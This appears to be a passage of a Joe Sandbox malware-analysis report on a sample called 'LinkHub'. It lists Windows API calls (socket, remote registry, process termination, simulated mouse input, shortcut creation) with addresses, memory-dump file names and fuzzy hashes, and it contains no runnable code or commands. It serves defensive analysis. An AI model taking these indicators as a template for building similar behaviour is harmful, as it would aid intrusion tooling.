                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00CF281D
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CF283E
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF284F
                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00CF2938
                                                                    • inet_ntoa.WSOCK32(?), ref: 00CF28E9
                                                                      • Part of subcall function 00CD433E: _strlen.LIBCMT ref: 00CD4348
                                                                      • Part of subcall function 00CF3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00CEF669), ref: 00CF3C9D
                                                                    • _strlen.LIBCMT ref: 00CF2992
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 3203458085-0
                                                                    • Opcode ID: 367aca6f8700438a4a7892bfcd5e00f2715f25f69c577911aeb4a98719894eab
                                                                    • Instruction ID: 11f1addb1c5ae53e13ccd495951b46450aa5945d468e3aaa70ba085010110fac
                                                                    • Opcode Fuzzy Hash: 367aca6f8700438a4a7892bfcd5e00f2715f25f69c577911aeb4a98719894eab
                                                                    • Instruction Fuzzy Hash: DEB1D371604305AFD324DF24C885F2A7BE5EF84318F54854CF56A4B2A2DB31EE45DB92
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 00CA042A
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA0446
                                                                    • __allrem.LIBCMT ref: 00CA045D
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA047B
                                                                    • __allrem.LIBCMT ref: 00CA0492
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA04B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                    • Instruction ID: 704f1de6ee41de3528a4bf506ebdc81150460e0f2ddd6f3eaf41acef829c4cf4
                                                                    • Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                    • Instruction Fuzzy Hash: 4C810A71A017079BEB24AE69CC81B6F73F8AF463A8F34412AF521D7292E770DE409754
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C98649,00C98649,?,?,?,00CA67C2,00000001,00000001,8BE85006), ref: 00CA65CB
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CA67C2,00000001,00000001,8BE85006,?,?,?), ref: 00CA6651
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CA674B
                                                                    • __freea.LIBCMT ref: 00CA6758
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    • __freea.LIBCMT ref: 00CA6761
                                                                    • __freea.LIBCMT ref: 00CA6786
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: 314037b5cc0983cef8a58643f1a391d49d363ec951079485e02a089722846472
                                                                    • Instruction ID: 10954a0fcb0a9706bc86a3408faf4353e70a26b4f0a7d02d1c3bd2312270bf70
                                                                    • Opcode Fuzzy Hash: 314037b5cc0983cef8a58643f1a391d49d363ec951079485e02a089722846472
                                                                    • Instruction Fuzzy Hash: 53510472620207AFDB258F64CC85EBB77AAEB4275CF190269FC24D6140EB34DD50D6A0
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC72A
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CFC785
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFC7CA
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CFC7F9
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CFC853
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFC85F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 1120388591-0
                                                                    • Opcode ID: f99e02df5bc601e3cf3b55c061509240a4cf47fa24b01d5cb5e1cf7d7b436c9c
                                                                    • Instruction ID: 03655e45306ff7432d079c93b8be76f4f357c118b0430d923e746beaddbfcf72
                                                                    • Opcode Fuzzy Hash: f99e02df5bc601e3cf3b55c061509240a4cf47fa24b01d5cb5e1cf7d7b436c9c
                                                                    • Instruction Fuzzy Hash: BA819D74208249AFC754EF24C984E2ABBE5FF84308F14845DF5598B2A2CB31ED45DB92
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000035), ref: 00CD00A9
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CD0150
                                                                    • VariantCopy.OLEAUT32(00CD0354,00000000), ref: 00CD0179
                                                                    • VariantClear.OLEAUT32(00CD0354), ref: 00CD019D
                                                                    • VariantCopy.OLEAUT32(00CD0354,00000000), ref: 00CD01A1
                                                                    • VariantClear.OLEAUT32(?), ref: 00CD01AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                    • String ID:
                                                                    • API String ID: 3859894641-0
                                                                    • Opcode ID: f0134cd3297d47152bf88f4a4ec185aaae192ad3c9762c0339cd267050af388a
                                                                    • Instruction ID: f68eff5ccf4d812b771f789843143d489394a2d178de72d724350848c91d811f
                                                                    • Opcode Fuzzy Hash: f0134cd3297d47152bf88f4a4ec185aaae192ad3c9762c0339cd267050af388a
                                                                    • Instruction Fuzzy Hash: 7A51EA31541310AACF20AB69D889B6DB3A5EF45310F34844BFA0ADF396DB709C40DB56
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00CE9F2A
                                                                    • _wcslen.LIBCMT ref: 00CE9F4B
                                                                    • _wcslen.LIBCMT ref: 00CE9F72
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00CE9FCA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                    • String ID: X
                                                                    • API String ID: 83654149-3081909835
                                                                    • Opcode ID: 16f893a82765fc698a038dd5ae16e7351a5528282fdd7387efa6e6430b213eba
                                                                    • Instruction ID: fd9b31ad31c75bcaa3df916d99054f0dd9557081fe659fa66b681629efcb1e49
                                                                    • Opcode Fuzzy Hash: 16f893a82765fc698a038dd5ae16e7351a5528282fdd7387efa6e6430b213eba
                                                                    • Instruction Fuzzy Hash: C5E1A1316043509FC724EF25C885B6AB7E1FF84314F14896DF99A8B2A2DB31DE05DB92
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00CE6F21
                                                                    • CoInitialize.OLE32(00000000), ref: 00CE707E
                                                                    • CoCreateInstance.OLE32(00D10CC4,00000000,00000001,00D10B34,?), ref: 00CE7095
                                                                    • CoUninitialize.OLE32 ref: 00CE7319
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: ffc8ff8418d460968ee912bfaae880adeaba6e2977f4849d8d02382fdc563e78
                                                                    • Instruction ID: 93483417b99762ed30eaa416aff39e54d1d69e1b30042d9df37ea39703b1b1c6
                                                                    • Opcode Fuzzy Hash: ffc8ff8418d460968ee912bfaae880adeaba6e2977f4849d8d02382fdc563e78
                                                                    • Instruction Fuzzy Hash: 98D15971508241AFC304EF24C885E6BB7E8FF98704F40896DF5998B262DB71ED49DB92
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • BeginPaint.USER32(?,?,?), ref: 00C71B35
                                                                    • GetWindowRect.USER32(?,?), ref: 00C71B99
                                                                    • ScreenToClient.USER32(?,?), ref: 00C71BB6
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C71BC7
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00C71C15
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00CB3287
                                                                      • Part of subcall function 00C71C2D: BeginPath.GDI32(00000000), ref: 00C71C4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 3050599898-0
                                                                    • Opcode ID: 9bec024c12a43c4e6c641f47d9defa37b40ea8da9c35b8d0e0c55b5034312ca7
                                                                    • Instruction ID: bbc1fa951b7b790e3f5d5708864c00563ca65109db7a262b8815a8731eba0cd0
                                                                    • Opcode Fuzzy Hash: 9bec024c12a43c4e6c641f47d9defa37b40ea8da9c35b8d0e0c55b5034312ca7
                                                                    • Instruction Fuzzy Hash: 6A41D470204344AFC711DF68DC85FBA7BA8EF46320F044669F9A8CB2A2C7319944DB62
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00CCFBEF,00000000,?,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00D08CA7
                                                                    • EnableWindow.USER32(?,00000000), ref: 00D08CCD
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00D08D2C
                                                                    • ShowWindow.USER32(?,00000004), ref: 00D08D40
                                                                    • EnableWindow.USER32(?,00000001), ref: 00D08D66
                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D08D8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 65789b76016e06795ce912e9c7ed529f3ad2a495b71da48ba01909417d8b148f
                                                                    • Instruction ID: bce35c99b1fe620f0cfc753009a42e46c94496c9d383d3f9e5758e0feaae2eb5
                                                                    • Opcode Fuzzy Hash: 65789b76016e06795ce912e9c7ed529f3ad2a495b71da48ba01909417d8b148f
                                                                    • Instruction Fuzzy Hash: 20416D34602344AFEB25DF24C889BA57BB1FB46304F1841A9E58D8B3E2CB31A855DB75
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00CF2D45
                                                                      • Part of subcall function 00CEEF33: GetWindowRect.USER32(?,?), ref: 00CEEF4B
                                                                    • GetDesktopWindow.USER32 ref: 00CF2D6F
                                                                    • GetWindowRect.USER32(00000000), ref: 00CF2D76
                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00CF2DB2
                                                                    • GetCursorPos.USER32(?), ref: 00CF2DDE
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CF2E3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                    • String ID:
                                                                    • API String ID: 2387181109-0
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00CD55F9
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CD5616
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CD564E
                                                                    • _wcslen.LIBCMT ref: 00CD566C
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CD5674
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00CD567E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 72514467-0
                                                                    APIs
                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                    • _wcslen.LIBCMT ref: 00CE62C0
                                                                    • CoInitialize.OLE32(00000000), ref: 00CE63DA
                                                                    • CoCreateInstance.OLE32(00D10CC4,00000000,00000001,00D10B34,?), ref: 00CE63F3
                                                                    • CoUninitialize.OLE32 ref: 00CE6411
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 3172280962-24824748
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D08740
                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00D08765
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D0877D
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00D087A6
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CEC1F2,00000000), ref: 00D087C6
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00D087B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 2294984445-0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00C936E9,00C93355), ref: 00C93700
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C9370E
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C93727
                                                                    • SetLastError.KERNEL32(00000000,?,00C936E9,00C93355), ref: 00C93779
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00CA2908,00D39B48,0000000C,00C93268,00000001,?,?), ref: 00CA30EB
                                                                    • _free.LIBCMT ref: 00CA311E
                                                                    • _free.LIBCMT ref: 00CA3146
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA3153
                                                                    • SetLastError.KERNEL32(00000000), ref: 00CA315F
                                                                    • _abort.LIBCMT ref: 00CA3165
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    APIs
                                                                      • Part of subcall function 00C71F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C71F87
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71F96
                                                                      • Part of subcall function 00C71F2D: BeginPath.GDI32(?), ref: 00C71FAD
                                                                      • Part of subcall function 00C71F2D: SelectObject.GDI32(?,00000000), ref: 00C71FD6
                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00D094AA
                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00D094BE
                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00D094CC
                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00D094DC
                                                                    • EndPath.GDI32(?), ref: 00D094EC
                                                                    • StrokePath.GDI32(?), ref: 00D094FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00CD5B7C
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CD5B8D
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CD5B94
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00CD5B9C
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CD5BB3
                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00CD5BC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C732AF
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C732B7
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C732C2
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C732CD
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C732D5
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C732DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CDF447
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CDF45D
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00CDF46C
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CDF47B
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CDF485
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CDF48C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 3fb86af0db0e03f0b05dfe108f20edac5abc64eacab4be1c20a025342d951311
                                                                    • Instruction ID: 585b7609afc677ed19a77b10699af725c8c4e757f15dedfbc84d4d956cba4f64
                                                                    • Opcode Fuzzy Hash: 3fb86af0db0e03f0b05dfe108f20edac5abc64eacab4be1c20a025342d951311
                                                                    • Instruction Fuzzy Hash: B8F03032241258BBE7215B929C0EFEF7B7DEFC6B11F00005AF609D1290DBA15A02C6B6
                                                                    APIs
                                                                    • GetClientRect.USER32(?), ref: 00CB34EF
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00CB3506
                                                                    • GetWindowDC.USER32(?), ref: 00CB3512
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00CB3521
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00CB3533
                                                                    • GetSysColor.USER32(00000005), ref: 00CB354D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
